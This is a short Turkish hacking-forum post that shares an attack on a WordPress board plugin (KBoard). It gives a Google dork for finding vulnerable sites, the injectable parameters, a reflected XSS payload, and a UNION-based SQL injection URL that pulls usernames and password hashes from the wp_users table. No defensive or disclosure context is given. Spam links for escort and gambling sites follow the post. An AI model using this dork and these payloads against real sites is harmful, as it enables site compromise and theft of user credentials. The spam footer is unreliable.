WordPress plugins SQL-XSS Vulnerabilities

Ens4R

Prof Spys-z
Katılım
9 Eki 2012
Mesajlar
1,642
Tepkime puanı
1
Puanları
0
Web sitesi
ajanlar.org
google dork

inurl:wp-content/plugins/kboard/board.php

açığın parametreleri: pageid, search, keyword
örnek:/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=burdan sonra xss veya sql

xss
/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=%22%27%3E%3CScRiPT%3Ealert%28/XSS/%29%3C/ScRiPT%3E

sql
/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=999%20union%20select%20group_concat%28user_login,0x3a,user_pass%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20wp_users

umarım anlamısınızdır
 

mersin escort bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012